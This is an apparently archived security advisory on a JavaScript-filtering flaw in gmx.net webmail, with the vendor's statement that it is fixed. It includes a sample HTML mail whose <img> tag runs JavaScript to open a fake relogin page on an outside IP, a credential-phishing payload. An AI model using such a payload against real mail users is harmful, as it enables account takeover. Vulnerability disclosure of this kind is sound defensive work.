Vulnerability

    gmx.net

Affected

    gmx.net

Description

    "rudi carell" found following.   gmx.net is a european-based  free
    web-mail, web-community system comparable with hotmail.com.   Like
    many  other  web-mail  systems  gmx.net  has  a  problem filtering
    java-script in html-based mail-messages.

    This enables  an attacker  to create  html-messages with malicious
    java-script embedded.

    The html - <img> tag can be used to embedd malicious  java-scripts
    within  html-mails.   Once  the  "html-mailpart"  is opened by the
    gmx-user it is possible the "embedded" java-script is executed  by
    the  web-browser  (if  enabled)  this  makes  it possible to place
    trojans  and  execute  URL-based  webmail-commands  leading  to  a
    compromise of the users webmail-account.

    Sample with "classic" relogin-trojan:

        <html><body>
        <img src="javascript: gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
        <h4>mungo baby</h4></body></html>

    ..  not  very  sophisticated  but working... changing user-options
    would be more elaborate ..

Solution

    gmx.net displays HTML-based message content in a special  security
    window  (called  "Volldarstellung"  =  full  display  mode)  which
    doesn't contain the  session ID of  the logged in  user.  Therefor
    it shouldn't be  possible to compromise  the users account  on our
    system by such tricks.  Anyway, this is fixed now.